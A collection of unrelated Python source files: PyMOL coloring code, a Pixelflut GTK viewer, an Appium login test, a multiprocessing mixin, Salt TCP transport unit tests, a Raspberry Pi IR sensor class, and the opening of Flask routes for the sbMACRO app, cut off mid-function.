_self.unset_deep([s for L in rep_setting_lists for (r, s) in L if s],
name, updates=0, quiet=quiet)
_self.color(color, name, quiet=quiet)
import colorsys
_spectrumany_interpolations = {
'hls': (colorsys.rgb_to_hls, colorsys.hls_to_rgb),
'hsv': (colorsys.rgb_to_hsv, colorsys.hsv_to_rgb),
'rgb': ((lambda *rgb: rgb), (lambda *rgb: rgb)),
}
def spectrumany(expression, colors, selection='(all)', minimum=None,
maximum=None, quiet=1, interpolation='rgb', *, _self=cmd):
'''
DESCRIPTION
Pure python implementation of the spectrum command. Supports arbitrary
color lists instead of palettes and any numerical atom property which
works in iterate as expression.
Non-numeric values (like resn) will be enumerated.
This is not a separate PyMOL command but is used as a fallback in "spectrum".
'''
from . import CmdException
try:
from_rgb, to_rgb = _spectrumany_interpolations[interpolation]
except KeyError:
raise CmdException('interpolation must be one of {}'.format(
list(_spectrumany_interpolations)))
if ' ' not in colors:
colors = palette_colors_dict.get(colors) or colors.replace('_', ' ')
quiet, colors = int(quiet), colors.split()
n_colors = len(colors)
if n_colors < 2:
raise CmdException('please provide at least 2 colors')
col_tuples = [_self.get_color_tuple(i) for i in colors]
if None in col_tuples:
raise CmdException('unknown color')
col_tuples = [from_rgb(*c) for c in col_tuples]
expression = {'pc': 'partial_charge', 'fc': 'formal_charge',
'resi': 'resv'}.get(expression, expression)
if expression == 'count':
e_list = list(range(_self.count_atoms(selection)))
else:
e_list = []
_self.iterate(selection, 'e_list.append(%s)' % (expression), space=locals())
try:
v_list = [float(v) for v in e_list if v is not None]
except (TypeError, ValueError):
if not quiet:
print(' Spectrum: Expression is non-numeric, enumerating values')
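# Non-numeric values: map each distinct value to its rank in sorted order so the
# spectrum spans the enumerated values.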
v_list = e_list = list(map(sorted(set(e_list)).index, e_list))
if not v_list:
return (0., 0.)
if minimum is None: minimum = min(v_list)
if maximum is None: maximum = max(v_list)
r = minimum, maximum = float(minimum), float(maximum)
if not quiet:
print(' Spectrum: range (%.5f to %.5f)' % r)
val_range = maximum - minimum
if not val_range:
_self.color(colors[0], selection)
return r
e_it = iter(e_list)
def next_color():
v = next(e_it)
if v is None:
return False
v = min(1.0, max(0.0, (float(v) - minimum) / val_range)) * (n_colors - 1)
i = min(int(v), n_colors - 2)
p = v - i
col = [(col_tuples[i+1][j] * p + col_tuples[i][j] * (1.0 - p))
for j in range(3)]
rgb = [int(0xFF * v) for v in to_rgb(*col)]
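# 0x40000000 marks the value as a packed 0x40RRGGBB color rather than a named color index.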
return 0x40000000 + rgb[0] * 0x10000 + rgb[1] * 0x100 + rgb[2]
_self.alter(selection, 'color = next_color() or color', space=locals())
_self.recolor(selection)
return r
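# Illustrative usage sketch (hypothetical selection and values): color polymer atoms by
# B-factor with a custom three-color gradient, interpolating in HSV space:
#     spectrumany('b', 'blue white red', 'polymer', interpolation='hsv')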
def spectrum(expression="count", palette="rainbow",
selection="(all)", minimum=None, maximum=None,
byres=0, quiet=1, interpolation='rgb', *, _self=cmd):
'''
DESCRIPTION
"spectrum" colors atoms with a spectrum of colors based on an atomic
property.
USAGE
spectrum [expression [, palette [, selection [, minimum [, maximum [, byres ]]]]]]
ARGUMENTS
expression = count, b, q, or pc: respectively, atom count, temperature factor,
occupancy, or partial charge {default: count}
palette = string: palette name or space separated list of colors
{default: rainbow}
selection = string: atoms to color {default: (all)}
minimum = float: {default: None (automatic)}
maximum = float: {default: None (automatic)}
byres = integer: controls whether coloring is applied per-residue {default: 0}
EXAMPLES
spectrum b, blue_red, minimum=10, maximum=50
spectrum count, rainbow_rev, chain A, byres=1
NOTES
Available palettes include:
blue_green blue_magenta blue_red blue_white_green
blue_white_magenta blue_white_red blue_white_yellow blue_yellow
cbmr cyan_magenta cyan_red cyan_white_magenta cyan_white_red
cyan_white_yellow cyan_yellow gcbmry green_blue green_magenta
green_red green_white_blue green_white_magenta green_white_red
green_white_yellow green_yellow green_yellow_red magenta_blue
magenta_cyan magenta_green magenta_white_blue
magenta_white_cyan magenta_white_green magenta_white_yellow
magenta_yellow rainbow rainbow2 rainbow2_rev rainbow_cycle
rainbow_cycle_rev rainbow_rev red_blue red_cyan red_green
red_white_blue red_white_cyan red_white_green red_white_yellow
red_yellow red_yellow_green rmbc yellow_blue yellow_cyan
yellow_cyan_white yellow_green yellow_magenta yellow_red
yellow_white_blue yellow_white_green yellow_white_magenta
yellow_white_red yrmbcg
PYMOL API
def spectrum(string expression, string palette,
string selection, float minimum, float maximum,
int byres, int quiet)
'''
palette_hit = palette_sc.shortcut.get(palette)
if palette_hit:
palette = palette_hit
if not expression.replace('_', '').isalpha() or not palette_hit:
return spectrumany(expression, palette, selection,
minimum, maximum, quiet, interpolation, _self=_self)
(prefix,digits,first,last) = palette_dict[str(palette)]
if (maximum is None) or (minimum is None):
minimum = 0 # signal to auto-adjust levels
maximum = -1
# preprocess selection
selection = selector.process(selection)
#
with _self.lockcm:
r = _cmd.spectrum(_self._COb,str(selection),str(expression),
float(minimum),float(maximum),
int(first),int(last),str(prefix),
int(digits),int(byres),int(quiet))
return r
def set_color(name, rgb, mode=0, quiet=1, *, _self=cmd):
'''
DESCRIPTION
"set_color" defines a new color using the red, green, and blue
(RGB) color components.
USAGE
set_color name, rgb
ARGUMENTS
name = string: name for the new or existing color
rgb = list of numbers: [red, green, blue] each and all in the range
(0.0, 1.0) or (0, 255)
EXAMPLES
set_color red, [ 1.0, 0.0, 0.0 ]
set_color yellow, [ 255, 255, 0 ]
NOTES
PyMOL automatically infers the range based on the input arguments.
It may be necessary to issue the "recolor" command in order to force
recoloring of existing objects.
SEE ALSO
recolor
PYMOL API
cmd.set_color(string name, list-of-numbers rgb, int mode )
'''
if isinstance(rgb, (str, bytes)):
rgb = safe_list_eval(rgb)
if not isinstance(rgb, (list, tuple)) or len(rgb) != 3:
raise pymol.CmdException(
"color specification must be a list such as [ 1.0, 0.0, 0.0 ]")
rgb = [float(c) for c in rgb]
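# If any component exceeds 1.0, treat the input as 0-255 and rescale to 0.0-1.0.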
if rgb[0] > 1.0 or rgb[1] > 1.0 or rgb[2] > 1.0:
rgb = [c / 0xFF for c in rgb]
with _self.lockcm:
r = _cmd.colordef(_self._COb, str(name), rgb[0], rgb[1], rgb[2],
int(mode), int(quiet))
_self._invalidate_color_sc()
return r
# Aliases for Mother England.
colour = color
set_colour = set_color
bg_colour = bg_color
recolour = recolor
def ipython_image(*args, _self=cmd, **kwargs):
"""Render the scene and return the image as an IPython.display.Image.
All arguments are forwarded to cmd.png().
@rtype IPython.display.Image
"""
import os, tempfile
from IPython.display import Image
# mkstemp avoids the race condition of the deprecated tempfile.mktemp
fd, filename = tempfile.mkstemp(".png")
os.close(fd)
_self.png(filename, *args, **kwargs)
try:
return Image(filename)
finally:
os.unlink(filename)
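# Illustrative usage sketch (assumes this function is exposed as cmd.ipython_image and
# that PyMOL is embedded in a Jupyter/IPython session); extra keywords go to cmd.png:
#     cmd.fragment('ala')
#     cmd.ipython_image(width=400, height=300, dpi=150)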
|
live_display.py
|
#!/usr/bin/env python3
import argparse
import time
import threading
import os
import sys
import gi
gi.require_version("Gtk", "3.0")
gi.require_version("GdkPixbuf", "2.0")
from gi.repository import Gtk, GdkPixbuf, GLib, GObject
SRC_DIR = os.path.abspath(os.path.join(os.path.dirname(os.path.dirname(__file__)), "src"))
sys.path.append(SRC_DIR)
from pixelflut_client import Client, BinaryAlgorithms
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("server_hostname")
parser.add_argument("server_port")
return parser.parse_args()
def get_new_pixbuf():
global client
receive_start = time.time()
pixels = client.receive_binary(BinaryAlgorithms.RgbBase64)
receive_end = time.time()
render_start = time.time()
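# Wrap the raw RGB bytes in a GdkPixbuf (no alpha, 8 bits per channel, rowstride = width * 3).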
pixbuf = GdkPixbuf.Pixbuf.new_from_bytes(
GLib.Bytes.new(pixels),
GdkPixbuf.Colorspace.RGB,
False,
8,
client.size[0],
client.size[1],
client.size[0] * 3,
)
render_end = time.time()
line = f"receiving: {receive_end - receive_start}s, rendering: {render_end - render_start}s, fps: {1 / ((receive_end - receive_start) + (render_end - render_start))}"
print(f"\033[K{line}\033[{len(line)}D", end="", flush=True)
return pixbuf
def display_pixbuf(pixbuf):
global image
image.set_from_pixbuf(pixbuf)
def update():
while True:
pixbuf = get_new_pixbuf()
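# GTK is not thread-safe; schedule the UI update on the main loop via idle_add.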
GLib.idle_add(display_pixbuf, pixbuf)
if __name__ == "__main__":
args = parse_args()
client = Client()
client.connect(args.server_hostname, int(args.server_port))
window = Gtk.Window(title=f"Pixelflut remote canvas ({args.server_hostname}:{args.server_port})")
window.set_default_size(client.size[0], client.size[1])
window.connect("destroy", Gtk.main_quit)
image = Gtk.Image.new()
window.add(image)
window.show_all()
worker = threading.Thread(target=update)
worker.daemon = True
worker.start()
Gtk.main()
|
try_login_case.py
|
# -*- coding: utf-8 -*-
# @Author : xiaoke
# @Email : 976249817@qq.com
import unittest
from time import sleep
from business.login_business import LoginBusiness
import sys, traceback
from base.login_exception import LoginException
# This can be solved in three ways: (1) the parameterized TestCase below, (2) a metaclass, (3) a single helper function
class ParameTestCase(unittest.TestCase):
def __init__(self, methodName='runTest', parame=None):
super().__init__(methodName)
self.parame = parame
global global_i
global_i = self.parame
class TestLoginCase(ParameTestCase):
@classmethod
def setUpClass(cls):
# Note: if a new driver (i.e. a new session) were created here each time, it would fail because a session already exists;
# the error reads roughly "a session is either terminated or not started"
cls.login_business = LoginBusiness(global_i)
# cls.splash_business = SplashBusiness(global_i)
cls.exception_list = LoginException()
def setUp(self):
print("this is setup")
def test01(self):
# Sleep for 4 seconds to allow time to manually navigate to the login page before the test acts
sleep(4)
self.login_business.login_success()
# def test02(self):
# print("test02")
# self.login_business.login_user_error()
def tearDown(self):
sleep(1)
print("this is teardown")
print("++++++++++++++++++>>>>%s" % str(sys.exc_info()[1]))
print("++++++++++++++++++>>>>%s" % str(self.exception_list.get_exception_length()))
# After a test case finishes, take a screenshot if the exception list contains any exceptions
if self.exception_list.get_exception_length():
self.login_business.login_handle.login_page.driver.get_screenshot_as_file("../image/login_error.png")
@classmethod
def tearDownClass(cls):
print("this is teardownclass")
# print("++++++++++++++++++>>>>%s" % str(sys.exc_info()[1])) # 捕获异常
# def appium_server():
# server = Server()
# server.main()
#
#
# # Add multiple suites
# def get_suite(i):
# suite = unittest.TestSuite()
# suite.addTest(TestLoginCase("test01", parame=i))
# suite.addTest((TestLoginCase("test02", parame=i)))
# # unittest.TextTestRunner().run(suite)
# # unittest.main(testRunner=HtmlTestRunner.HTMLTestRunner(output="interface"))
# # HtmlTestRunner.HTMLTestRunner(output="login_test", report_title="xiaoke").run(suite)
# # html_file = "E:/pycharmProject/appium/appiumProject/reports/login_test" + str(i) + ".html"
# # with open(html_file, "w") as f:
# HtmlTestRunner.HTMLTestRunner(output="test").run(suite)
#
#
# if __name__ == '__main__':
# # Start the Appium server before the project begins
# appium_server()
# threads = []
# for i in range(2):
# # Generate one report per device
# # Multithreading causes data to get mixed together and does not give the desired result
# # th = threading.Thread(target=get_suite, args=(i,))
# th = multiprocessing.Process(target=get_suite, args=(i,))
# threads.append(th)
#
# for y in threads:
# # Since execution is multithreaded, delay each thread by 1 second so that the report
# # generated by every thread is written out and displayed
# sleep(1)
# y.start()
|
process_mixin.py
|
# Copyright 2020 Pax Syriana Foundation. Licensed under the Apache License, Version 2.0
#
import time
from abc import ABCMeta
from abc import abstractmethod
from multiprocessing import Process
from multiprocessing.managers import BaseManager
from via_common.multiprocess.logger_manager import LoggerManager
from via_common.multiprocess.pipe_adapter import PipeAdapter
from via_common.util.config_mixin_logger import ConfigMixInLogger
from via_common.util.config_mixin_server import ConfigMixInServer
class ProcessMixin(metaclass=ABCMeta):
"""
A helper MixIn to manage sub-process for connecting to a server.
Each object can spawn only one sub-process.
The object sets up the necessary plumbing for the sub-process to access the multiprocessing
system_queue, the logger_queue and any other queues given as arguments by name.
Derived classes are responsible for defining:
- the shutdown mechanism. It can use the system_queue.
- the logger object must be set by the derived classes.
- the _run_child_forever interface. For convenience the logger_queue is passed as an
argument.
"""
def __init__(self, process_name, config_internal_conn: ConfigMixInServer, config_logger: ConfigMixInLogger, queue_name_list, shutdown_receiver):
self.process_name = process_name
self.config_internal_conn = config_internal_conn
self.config_logger = config_logger
self.queue_name_list = queue_name_list
self.shutdown_receiver = shutdown_receiver
self.shutdown_handler = None
self.system_queue = None
self.impl = Process(target=self._run_child_process, args=(config_internal_conn.__class__, config_logger.__class__,), daemon=True)
self.logger = None
self._initialise_child_logger()
if not self.logger:
raise ValueError('The logger of the process object must be setup')
@abstractmethod
def shutdown(self):
# The mechanism uses a pipe to send a SIGNAL_SHUTDOWN_START command to each process.
# The pipe is handled by an orchestrator.
raise NotImplementedError
@abstractmethod
def _initialise_child_logger(self):
# the queue for the logger is set by ProcessMixin,
# but the derived objects need to set the logger for themselves,
# otherwise, the class name would be the one of the base class in the log
raise NotImplementedError
@abstractmethod
def _run_child_forever(self, logger_queue):
# The base class uses _run_child_process to initialise the process, then passes responsibility
# to the derived object to do further work if needed.
raise NotImplementedError
#
# Process override
#
def start(self):
self.impl.start()
def join(self):
self.impl.join()
def close(self):
self.impl.close()
def get_process(self):
return self.impl
#
# Process.target
#
def _run_child_process(self, config_conn_cls, config_logger_cls):
# All this is to setup the logger_queue to be able to log.
self.config_internal_conn = config_conn_cls()
self.config_logger = config_logger_cls()
# Arguments here are passed through pickle; they cannot be class members.
self.shutdown_handler = PipeAdapter(self.shutdown_receiver, self.shutdown)
self.shutdown_handler.start()
if self.queue_name_list:
for queue_name in self.queue_name_list:
BaseManager.register(queue_name)
# end for queue_name in queue_name_list
# end if queue_name_list
BaseManager.register('logger_queue')
BaseManager.register('system_queue')
manager = BaseManager(address=(self.config_internal_conn.host(),
self.config_internal_conn.port()),
authkey=self.config_internal_conn.authkey().encode())
time.sleep(0.5)
attempt = 5
while attempt:
try:
manager.connect()
break
except Exception as e: # TODO exception: which one(s)
attempt -= 1
# end while attempt
if attempt == 0:
raise RuntimeError("{} child process FAILED to start".format(self.__class__.__name__))
# Create the object fields for the queues
if self.queue_name_list:
for queue_name in self.queue_name_list:
self.__dict__[queue_name] = manager.__getattribute__(queue_name)()
# end for queue_name in queue_name_list
# end if queue_name_list
# Set the queue for the logger
self.system_queue = manager.system_queue()
logger_queue = manager.logger_queue()
LoggerManager.set_child_logger_queue(self.config_logger, logger_queue)
self.logger = LoggerManager.get_logger(self.process_name)
self.logger.info('Sub-process [{}] initialized'.format(self.process_name))
self._run_child_forever(logger_queue)
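# Illustrative sketch (not part of the original module): a concrete subclass is expected
# to implement the three abstract hooks, roughly along these lines (names are hypothetical):
#
#     class EchoWorker(ProcessMixin):
#         def shutdown(self):
#             self.logger.info('shutting down %s', self.process_name)
#
#         def _initialise_child_logger(self):
#             self.logger = LoggerManager.get_logger(self.__class__.__name__)
#
#         def _run_child_forever(self, logger_queue):
#             while True:
#                 time.sleep(1)  # real work would drain the registered queues here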
|
test_tcp.py
|
# -*- coding: utf-8 -*-
"""
:codeauthor: Thomas Jackson <jacksontj.89@gmail.com>
"""
from __future__ import absolute_import, print_function, unicode_literals
import logging
import socket
import threading
import salt.config
import salt.exceptions
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.ioloop
import salt.transport.client
import salt.transport.server
import salt.utils.platform
import salt.utils.process
from salt.ext import six
from salt.ext.six.moves import range
from salt.ext.tornado.testing import AsyncTestCase, gen_test
from salt.transport.tcp import (
SaltMessageClient,
SaltMessageClientPool,
TCPPubServerChannel,
)
from saltfactories.utils.ports import get_unused_localhost_port
from tests.support.helpers import flaky, slowTest
from tests.support.mixins import AdaptedConfigurationTestCaseMixin
from tests.support.mock import MagicMock, patch
from tests.support.unit import TestCase, skipIf
from tests.unit.transport.mixins import (
PubChannelMixin,
ReqChannelMixin,
run_loop_in_thread,
)
log = logging.getLogger(__name__)
class BaseTCPReqCase(TestCase, AdaptedConfigurationTestCaseMixin):
"""
Test the req server/client pair
"""
@classmethod
def setUpClass(cls):
if not hasattr(cls, "_handle_payload"):
return
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "tcp",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
}
)
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "tcp",
"master_ip": "127.0.0.1",
"master_port": ret_port,
"master_uri": "tcp://127.0.0.1:{0}".format(ret_port),
}
)
cls.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager"
)
cls.server_channel = salt.transport.server.ReqServerChannel.factory(
cls.master_config
)
cls.server_channel.pre_fork(cls.process_manager)
cls.io_loop = salt.ext.tornado.ioloop.IOLoop()
cls.stop = threading.Event()
cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(
target=run_loop_in_thread, args=(cls.io_loop, cls.stop,),
)
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
cls.server_channel.close()
cls.stop.set()
cls.server_thread.join()
cls.process_manager.kill_children()
del cls.server_channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send_clear"}))
@skipIf(salt.utils.platform.is_darwin(), "hanging test suite on MacOS")
class ClearReqTestCases(BaseTCPReqCase, ReqChannelMixin):
"""
Test all of the clear msg stuff
"""
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(
self.minion_config, crypt="clear"
)
def tearDown(self):
self.channel.close()
del self.channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send_clear"}))
@skipIf(salt.utils.platform.is_darwin(), "hanging test suite on MacOS")
class AESReqTestCases(BaseTCPReqCase, ReqChannelMixin):
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_config)
def tearDown(self):
self.channel.close()
del self.channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send"}))
# TODO: make failed returns have a specific framing so we can raise the same exception
# on encrypted channels
@flaky
@slowTest
def test_badload(self):
"""
Test a variety of bad requests and make sure that we get some sort of error
"""
msgs = ["", [], tuple()]
for msg in msgs:
with self.assertRaises(salt.exceptions.AuthenticationError):
ret = self.channel.send(msg)
class BaseTCPPubCase(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
"""
Test the pub server/client pair
"""
@classmethod
def setUpClass(cls):
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "tcp",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
}
)
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "tcp",
"master_ip": "127.0.0.1",
"auth_timeout": 1,
"master_port": ret_port,
"master_uri": "tcp://127.0.0.1:{0}".format(ret_port),
}
)
cls.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager"
)
cls.server_channel = salt.transport.server.PubServerChannel.factory(
cls.master_config
)
cls.server_channel.pre_fork(cls.process_manager)
# we also require req server for auth
cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(
cls.master_config
)
cls.req_server_channel.pre_fork(cls.process_manager)
cls.io_loop = salt.ext.tornado.ioloop.IOLoop()
cls.stop = threading.Event()
cls.req_server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(
target=run_loop_in_thread, args=(cls.io_loop, cls.stop,),
)
cls.server_thread.start()
@classmethod
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
return payload, {"fun": "send_clear"}
@classmethod
def tearDownClass(cls):
cls.req_server_channel.close()
cls.server_channel.close()
cls.stop.set()
cls.server_thread.join()
cls.process_manager.kill_children()
del cls.req_server_channel
def setUp(self):
super(BaseTCPPubCase, self).setUp()
self._start_handlers = dict(self.io_loop._handlers)
def tearDown(self):
super(BaseTCPPubCase, self).tearDown()
failures = []
for k, v in six.iteritems(self.io_loop._handlers):
if self._start_handlers.get(k) != v:
failures.append((k, v))
if failures:
raise Exception("FDs still attached to the IOLoop: {0}".format(failures))
del self.channel
del self._start_handlers
class AsyncTCPPubChannelTest(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
@slowTest
def test_connect_publish_port(self):
"""
test when publish_port is not 4506
"""
opts = self.get_temp_config("master")
opts["master_uri"] = ""
opts["master_ip"] = "127.0.0.1"
opts["publish_port"] = 1234
channel = salt.transport.tcp.AsyncTCPPubChannel(opts)
patch_auth = MagicMock(return_value=True)
patch_client = MagicMock(spec=SaltMessageClientPool)
with patch("salt.crypt.AsyncAuth.gen_token", patch_auth), patch(
"salt.crypt.AsyncAuth.authenticated", patch_auth
), patch("salt.transport.tcp.SaltMessageClientPool", patch_client):
channel.connect()
assert patch_client.call_args[0][0]["publish_port"] == opts["publish_port"]
@skipIf(True, "Skip until we can devote time to fix this test")
class AsyncPubChannelTest(BaseTCPPubCase, PubChannelMixin):
"""
Tests around the publish system
"""
class SaltMessageClientPoolTest(AsyncTestCase):
def setUp(self):
super(SaltMessageClientPoolTest, self).setUp()
sock_pool_size = 5
with patch(
"salt.transport.tcp.SaltMessageClient.__init__",
MagicMock(return_value=None),
):
self.message_client_pool = SaltMessageClientPool(
{"sock_pool_size": sock_pool_size}, args=({}, "", 0)
)
self.original_message_clients = self.message_client_pool.message_clients
self.message_client_pool.message_clients = [
MagicMock() for _ in range(sock_pool_size)
]
def tearDown(self):
with patch(
"salt.transport.tcp.SaltMessageClient.close", MagicMock(return_value=None)
):
del self.original_message_clients
super(SaltMessageClientPoolTest, self).tearDown()
def test_send(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.send_queue = [0, 0, 0]
message_client_mock.send.return_value = []
self.assertEqual([], self.message_client_pool.send())
self.message_client_pool.message_clients[2].send_queue = [0]
self.message_client_pool.message_clients[2].send.return_value = [1]
self.assertEqual([1], self.message_client_pool.send())
def test_write_to_stream(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.send_queue = [0, 0, 0]
message_client_mock._stream.write.return_value = []
self.assertEqual([], self.message_client_pool.write_to_stream(""))
self.message_client_pool.message_clients[2].send_queue = [0]
self.message_client_pool.message_clients[2]._stream.write.return_value = [1]
self.assertEqual([1], self.message_client_pool.write_to_stream(""))
def test_close(self):
self.message_client_pool.close()
self.assertEqual([], self.message_client_pool.message_clients)
def test_on_recv(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.on_recv.return_value = None
self.message_client_pool.on_recv()
for message_client_mock in self.message_client_pool.message_clients:
self.assertTrue(message_client_mock.on_recv.called)
def test_connect_all(self):
@gen_test
def test_connect(self):
yield self.message_client_pool.connect()
for message_client_mock in self.message_client_pool.message_clients:
future = salt.ext.tornado.concurrent.Future()
future.set_result("foo")
message_client_mock.connect.return_value = future
self.assertIsNone(test_connect(self))
def test_connect_partial(self):
@gen_test(timeout=0.1)
def test_connect(self):
yield self.message_client_pool.connect()
for idx, message_client_mock in enumerate(
self.message_client_pool.message_clients
):
future = salt.ext.tornado.concurrent.Future()
if idx % 2 == 0:
future.set_result("foo")
message_client_mock.connect.return_value = future
with self.assertRaises(salt.ext.tornado.ioloop.TimeoutError):
test_connect(self)
class SaltMessageClientCleanupTest(TestCase, AdaptedConfigurationTestCaseMixin):
def setUp(self):
self.listen_on = "127.0.0.1"
self.port = get_unused_localhost_port()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.listen_on, self.port))
self.sock.listen(1)
def tearDown(self):
self.sock.close()
del self.sock
def test_message_client(self):
"""
test message client cleanup on close
"""
orig_loop = salt.ext.tornado.ioloop.IOLoop()
orig_loop.make_current()
opts = self.get_temp_config("master")
client = SaltMessageClient(opts, self.listen_on, self.port)
# Mock the io_loop's stop method so we know when it has been called.
orig_loop.real_stop = orig_loop.stop
orig_loop.stop_called = False
def stop(*args, **kwargs):
orig_loop.stop_called = True
orig_loop.real_stop()
orig_loop.stop = stop
try:
assert client.io_loop == orig_loop
client.io_loop.run_sync(client.connect)
# Ensure we are testing the _read_until_future and io_loop teardown
assert client._stream is not None
assert client._read_until_future is not None
assert orig_loop.stop_called is True
# The run_sync call will set stop_called, reset it
orig_loop.stop_called = False
client.close()
# Stop should be called again, client's io_loop should be None
assert orig_loop.stop_called is True
assert client.io_loop is None
finally:
orig_loop.stop = orig_loop.real_stop
del orig_loop.real_stop
del orig_loop.stop_called
class TCPPubServerChannelTest(TestCase, AdaptedConfigurationTestCaseMixin):
@patch("salt.master.SMaster.secrets")
@patch("salt.crypt.Crypticle")
@patch("salt.utils.asynchronous.SyncWrapper")
def test_publish_filtering(self, sync_wrapper, crypticle, secrets):
opts = self.get_temp_config("master")
opts["sign_pub_messages"] = False
channel = TCPPubServerChannel(opts)
wrap = MagicMock()
crypt = MagicMock()
crypt.dumps.return_value = {"test": "value"}
secrets.return_value = {"aes": {"secret": None}}
crypticle.return_value = crypt
sync_wrapper.return_value = wrap
# try simple publish with glob tgt_type
channel.publish({"test": "value", "tgt_type": "glob", "tgt": "*"})
payload = wrap.send.call_args[0][0]
# verify we send it without any specific topic
assert "topic_lst" not in payload
# try simple publish with list tgt_type
channel.publish({"test": "value", "tgt_type": "list", "tgt": ["minion01"]})
payload = wrap.send.call_args[0][0]
# verify we send it with correct topic
assert "topic_lst" in payload
self.assertEqual(payload["topic_lst"], ["minion01"])
# try with syndic settings
opts["order_masters"] = True
channel.publish({"test": "value", "tgt_type": "list", "tgt": ["minion01"]})
payload = wrap.send.call_args[0][0]
# verify we send it without topic for syndics
assert "topic_lst" not in payload
@patch("salt.utils.minions.CkMinions.check_minions")
@patch("salt.master.SMaster.secrets")
@patch("salt.crypt.Crypticle")
@patch("salt.utils.asynchronous.SyncWrapper")
def test_publish_filtering_str_list(
self, sync_wrapper, crypticle, secrets, check_minions
):
opts = self.get_temp_config("master")
opts["sign_pub_messages"] = False
channel = TCPPubServerChannel(opts)
wrap = MagicMock()
crypt = MagicMock()
crypt.dumps.return_value = {"test": "value"}
secrets.return_value = {"aes": {"secret": None}}
crypticle.return_value = crypt
sync_wrapper.return_value = wrap
check_minions.return_value = {"minions": ["minion02"]}
# try simple publish with list tgt_type
channel.publish({"test": "value", "tgt_type": "list", "tgt": "minion02"})
payload = wrap.send.call_args[0][0]
# verify we send it with correct topic
assert "topic_lst" in payload
self.assertEqual(payload["topic_lst"], ["minion02"])
# verify it was correctly calling check_minions
check_minions.assert_called_with("minion02", tgt_type="list")
|
irSensor.py
|
import RPi.GPIO as GPIO
import time
import threading
from SAN.sensorDataEntry import SensorDataEntry
gpioPin = 23
class IrSensor(SensorDataEntry):
def __init__(self):
SensorDataEntry.__init__(self)
GPIO.setmode(GPIO.BCM)
GPIO.setup(gpioPin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
self._objectPresence = None
threading.Thread(target=self.loop).start()
def __del__(self):
GPIO.cleanup()
def loop(self):
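# Poll the sensor roughly every 10 ms and record a reading only when the presence state changes.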
while True:
time.sleep(0.01)
currentObjectPresence = GPIO.input(gpioPin) == 1
if self._objectPresence != currentObjectPresence:
self._objectPresence = currentObjectPresence
self.addReading(currentObjectPresence)
self.set_dirty()
@property
def sensorId(self):
return "ir_1"
@property
def sensorType(self):
return "IR Sensor"
@property
def measurementType(self):
return "Object Presence"
|
routes.py
|
"""Define main application routes."""
import os
import sys
import openpyxl
from datetime import datetime
from collections import OrderedDict
from flask import render_template, redirect, url_for, request, jsonify, current_app, session
from flask_login import current_user, login_required
from wtforms import StringField, SubmitField, TextAreaField, PasswordField
from wtforms import BooleanField
from wtforms.validators import ValidationError, DataRequired, Length, Email
from wtforms.validators import Optional
from app import db
from lxml import etree
import urllib
import requests
from xml.dom import minidom
from app.main.forms import EditProfileForm, FyForm, SearchForm, GeneralForm
from app.models import User, casc, FiscalYear, Project, Item, SbFile, MasterDetails
from app.main import bp
from app.main.metadata import write_metadata
from app.auth.read_sheets import get_sheet_name, parse_values
from app.updater.__init__ import casc_update, search_table_update, graphs_update, proj_matches_update
import multiprocessing
import time
from nltk.corpus import stopwords
from config import Config
# from sbmacro import socketio
from pprint import pprint
# my_root = os.path.dirname(os.path.abspath(__file__))
# path_to_static = os.path.join(my_root, 'templates/static/')
path_to_static = os.getcwd() + '/app/main/templates/static/'
@bp.before_app_request
def before_request():
"""Update user 'last seen' field before each request."""
if current_user.is_authenticated:
current_user.last_seen = datetime.utcnow()
db.session.commit()
current_user.search_form = SearchForm()
@bp.route('/', methods=['GET', 'POST']) # Also accepts
@bp.route('/index', methods=['GET', 'POST']) # Default
def index():
"""Render splash page for sbMACRO."""
# class F(GeneralForm):
# def __init__(i, buttonText):
